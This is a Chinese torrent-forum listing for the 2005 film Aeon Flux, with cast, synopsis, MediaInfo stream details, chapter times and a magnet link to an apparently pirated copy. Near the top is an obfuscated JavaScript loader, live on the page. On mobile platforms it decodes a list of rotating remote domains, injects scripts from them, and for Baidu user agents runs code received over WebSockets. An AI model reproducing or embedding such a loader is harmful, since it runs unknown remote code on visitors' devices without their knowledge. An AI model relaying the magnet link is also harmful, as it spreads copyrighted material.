魔力女战士[国语音轨/双语字幕]Aeon.Flux.2005.1080p.BluRay.DTS.2Audio.x265-10bit-迅雷下载 6.97GB

版主小s 14天前 3816

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x5a\x7a\x72\x64\x63\x78\x64\x57\x4c\x41']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 魔力女战士 / Aeon Flux / 万古流传 / 倩影刺客

◎片 名 ?on Flux

◎年 代 2005

◎产 地 美国

◎类 别 动作 / 科幻 / 冒险

◎语 言 英语

◎上映日期 2005-12-02

◎IMDb评分 5.5/10 from 124162 users

◎IMDb链接 https://www.imdb.com/title/tt0402022

◎豆瓣评分 5.7/10 from 13829 users

◎豆瓣链接 https://movie.douban.com/subject/1309065/

◎片 长 93 分钟

◎导 演 卡瑞恩·库萨马 Karyn Kusama

◎编 剧 费尔·海伊 Phil Hay / 马特·曼弗莱迪 Matt Manfredi / 钟彼得 Peter Chung

◎主 演 查理兹·塞隆 Charlize Theron

马尔顿·索克斯 Marton Csokas

约翰尼·李·米勒 Jonny Lee Miller

苏菲·奥康内多 Sophie Okonedo

弗兰西斯·麦克多蒙德 Frances McDormand

皮特·波斯尔思韦特 Pete Postlethwaite

阿梅丽娅·华纳 Amelia Warner

卡罗琳·奇克泽 Caroline Chikezie

尼科莱·金斯基 Nikolai Kinski

佩特逊·约瑟夫 Paterson Joseph

央宗?布劳恩 Yangzom Brauen

Thomas Huber

Weijian Liu

Maverick Quek

Ralph Herforth

Megan Gay

查理·比尔 Charlie Beall

Ronald Marx

阿克瑟·施奈伯 Axel Schreiber

肖恩·劳顿 Shaun Lawton

贝蒂 奥金诺 Betty Okino

安纳托·陶布曼 Anatole Taubman

拉文尼娅·威尔森 Lavinia Wilson

费尔·海伊 Phil Hay

Bojan Heyn

Joost Siedhoff

娜格斯·拉什迪 Narges Rashidi

米尔顿·威尔士 Milton Welsh

Natacza Boon

迈克尔·品克 Michael Pink

Jannik Büddig

米尔科·朗 Mirko Lang

Mickey Nedimovic

维尔·鲁特根 Wil R?ttgen

沃尔夫冈·施特格曼 Wolfgang Stegemann

斯图尔特·汤森德 Stuart Townsend

蒂米·特林克斯 Timmi Trinks

◎标 签 科幻 | 动作 | 美国 | CharlizeTheron | 美国电影 | 魔力女战士 | 2005 | 电影

◎简 介

21世纪初,一场瘟疫夺去了99%的人类生命,幸存者们依靠科学家古德查德的发明,建造孤城布瑞拉格维系文明。时间过去四百年后,部分市民不满古德查德政权独裁统治与持续发生的失踪案,组建武装力量魔力党(Monicans)对抗。女战士伊恩(查理兹·塞隆 Charlize Theron 饰)是魔力党中实力顶尖的人物,在完成破坏古德查德监控系统的任务中,伊恩目睹了被对方杀害的亲妹遗体,伊恩在怒火添胸时得到了刺杀古德查德首脑特雷弗的指令,但当她与特雷弗面对面时,对方呼唤“凯瑟琳”这个名字让她陷入混乱的记忆无法行动。伊恩脱身后着手调查这座城市的真相,发现一直以来的失踪案与克隆计划息息相关,而布瑞拉格运行的基础便是复制人类。伊恩的发现很快引起连锁反应,将各方势力卷入其中……

  1. General

  2. Unique ID : 207893733085833450199316895158602158865 (0x9C66E0678CC3598598281EED5C81D311)

  3. Complete name : [email protected]OM.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 6.97 GiB

  7. Duration : 1 h 32 min

  8. Overall bit rate : 10.8 Mb/s

  9. Movie name : Aeon Flux 2005 1080p BluRay DTS 2Audio [email protected]

  10. Encoded date : UTC 2021-07-12 06:35:28

  11. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  12. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@High

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 1 h 32 min

  20. Bit rate : 7 673 kb/s

  21. Width : 1 920 pixels

  22. Height : 816 pixels

  23. Display aspect ratio : 2.35:1

  24. Frame rate mode : Constant

  25. Frame rate : 23.976 (24000/1001/53354) FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 10 bits

  29. Bits/(Pixel*Frame) : 0.204

  30. Stream size : 4.98 GiB (71%)

  31. Title : @HDSky

  32. Writing library : x265 - H.265/HEVC codec

  33. Default : Yes

  34. Forced : No


  35. Audio #1

  36. ID : 2

  37. Format : DTS

  38. Format/Info : Digital Theater Systems

  39. Codec ID : A_DTS

  40. Duration : 1 h 32 min

  41. Bit rate mode : Constant

  42. Bit rate : 1 509 kb/s

  43. Channel(s) : 6 channels

  44. Channel layout : C L R Ls Rs LFE

  45. Sampling rate : 48.0 kHz

  46. Frame rate : 93.750 FPS (512 SPF)

  47. Bit depth : 24 bits

  48. Compression mode : Lossy

  49. Stream size : 1 002 MiB (14%)

  50. Title : English

  51. Language : English

  52. Default : Yes

  53. Forced : No


  54. Audio #2

  55. ID : 3

  56. Format : DTS

  57. Format/Info : Digital Theater Systems

  58. Codec ID : A_DTS

  59. Duration : 1 h 32 min

  60. Bit rate mode : Constant

  61. Bit rate : 1 510 kb/s

  62. Channel(s) : 6 channels

  63. Channel layout : C L R Ls Rs LFE

  64. Sampling rate : 48.0 kHz

  65. Frame rate : 93.750 FPS (512 SPF)

  66. Bit depth : 16 bits

  67. Compression mode : Lossy

  68. Stream size : 1 003 MiB (14%)

  69. Title : Mandarin

  70. Language : Chinese

  71. Default : No

  72. Forced : No


  73. Text #1

  74. ID : 4

  75. Format : PGS

  76. Muxing mode : zlib

  77. Codec ID : S_HDMV/PGS

  78. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  79. Duration : 1 h 23 min

  80. Bit rate : 19.0 kb/s

  81. Count of elements : 1444

  82. Stream size : 11.4 MiB (0%)

  83. Title : ENG

  84. Language : English

  85. Default : Yes

  86. Forced : No


  87. Text #2

  88. ID : 5

  89. Format : PGS

  90. Muxing mode : zlib

  91. Codec ID : S_HDMV/PGS

  92. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  93. Duration : 1 h 24 min

  94. Bit rate : 14.1 kb/s

  95. Count of elements : 1456

  96. Stream size : 8.57 MiB (0%)

  97. Title : CHS

  98. Language : Chinese

  99. Default : No

  100. Forced : No


  101. Text #3

  102. ID : 6

  103. Format : PGS

  104. Muxing mode : zlib

  105. Codec ID : S_HDMV/PGS

  106. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  107. Duration : 1 h 24 min

  108. Bit rate : 14.7 kb/s

  109. Count of elements : 1456

  110. Stream size : 8.89 MiB (0%)

  111. Title : CHT

  112. Language : Chinese

  113. Default : No

  114. Forced : No


  115. Text #4

  116. ID : 7

  117. Format : PGS

  118. Muxing mode : zlib

  119. Codec ID : S_HDMV/PGS

  120. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  121. Duration : 1 h 24 min

  122. Bit rate : 15.3 kb/s

  123. Count of elements : 1583

  124. Stream size : 9.28 MiB (0%)

  125. Title : CHS

  126. Language : Chinese

  127. Default : No

  128. Forced : No


  129. Text #5

  130. ID : 8

  131. Format : PGS

  132. Muxing mode : zlib

  133. Codec ID : S_HDMV/PGS

  134. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  135. Duration : 1 h 24 min

  136. Bit rate : 15.8 kb/s

  137. Count of elements : 1583

  138. Stream size : 9.58 MiB (0%)

  139. Title : CHT

  140. Language : Chinese

  141. Default : No

  142. Forced : No


  143. Text #6

  144. ID : 9

  145. Format : PGS

  146. Muxing mode : zlib

  147. Codec ID : S_HDMV/PGS

  148. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  149. Duration : 1 h 24 min

  150. Bit rate : 27.1 kb/s

  151. Count of elements : 1583

  152. Stream size : 16.4 MiB (0%)

  153. Title : CHS&ENG

  154. Language : Chinese

  155. Default : No

  156. Forced : No


  157. Text #7

  158. ID : 10

  159. Format : PGS

  160. Muxing mode : zlib

  161. Codec ID : S_HDMV/PGS

  162. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  163. Duration : 1 h 24 min

  164. Bit rate : 27.6 kb/s

  165. Count of elements : 1583

  166. Stream size : 16.7 MiB (0%)

  167. Title : CHT&ENG

  168. Language : Chinese

  169. Default : No

  170. Forced : No


  171. Menu

  172. 00:00:00.000 : en:Chapter 01

  173. 00:00:47.047 : en:Chapter 02

  174. 00:03:43.264 : en:Chapter 03

  175. 00:05:27.785 : en:Chapter 04

  176. 00:07:27.530 : en:Chapter 05

  177. 00:09:48.754 : en:Chapter 06

  178. 00:11:34.693 : en:Chapter 07

  179. 00:14:43.215 : en:Chapter 08

  180. 00:14:50.389 : en:Chapter 09

  181. 00:14:58.272 : en:Chapter 10

  182. 00:18:12.966 : en:Chapter 11

  183. 00:19:22.786 : en:Chapter 12

  184. 00:22:08.493 : en:Chapter 13

  185. 00:24:17.455 : en:Chapter 14

  186. 00:26:19.452 : en:Chapter 15

  187. 00:26:32.173 : en:Chapter 16

  188. 00:27:29.981 : en:Chapter 17

  189. 00:29:07.829 : en:Chapter 18

  190. 00:31:02.986 : en:Chapter 19

  191. 00:33:25.878 : en:Chapter 20

  192. 00:35:55.444 : en:Chapter 21

  193. 00:36:20.011 : en:Chapter 22

  194. 00:37:31.665 : en:Chapter 23

  195. 00:38:10.871 : en:Chapter 24

  196. 00:40:28.676 : en:Chapter 25

  197. 00:42:48.357 : en:Chapter 26

  198. 00:43:34.987 : en:Chapter 27

  199. 00:44:40.093 : en:Chapter 28

  200. 00:48:05.966 : en:Chapter 29

  201. 00:50:32.112 : en:Chapter 30

  202. 00:52:23.640 : en:Chapter 31

  203. 00:54:07.786 : en:Chapter 32

  204. 00:56:06.946 : en:Chapter 33

  205. 00:59:31.901 : en:Chapter 34

  206. 01:00:22.743 : en:Chapter 35

  207. 01:02:47.305 : en:Chapter 36

  208. 01:04:47.383 : en:Chapter 37

  209. 01:06:50.673 : en:Chapter 38

  210. 01:08:09.376 : en:Chapter 39

  211. 01:08:25.934 : en:Chapter 40

  212. 01:10:44.740 : en:Chapter 41

  213. 01:12:54.745 : en:Chapter 42

  214. 01:15:08.628 : en:Chapter 43

  215. 01:18:39.339 : en:Chapter 44

  216. 01:21:09.447 : en:Chapter 45

  217. 01:24:23.474 : en:Chapter 46

  218. 01:25:41.969 : en:Chapter 47

  219. 01:25:49.852 : en:Chapter 48

  220. 01:27:42.882 : en:Chapter 49



TAGS 动作 冒险 科幻

磁力链:
  • magnet:?xt=urn:btih:2361DAB710BB622C82151EBBDE87CECCFF0C7666
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回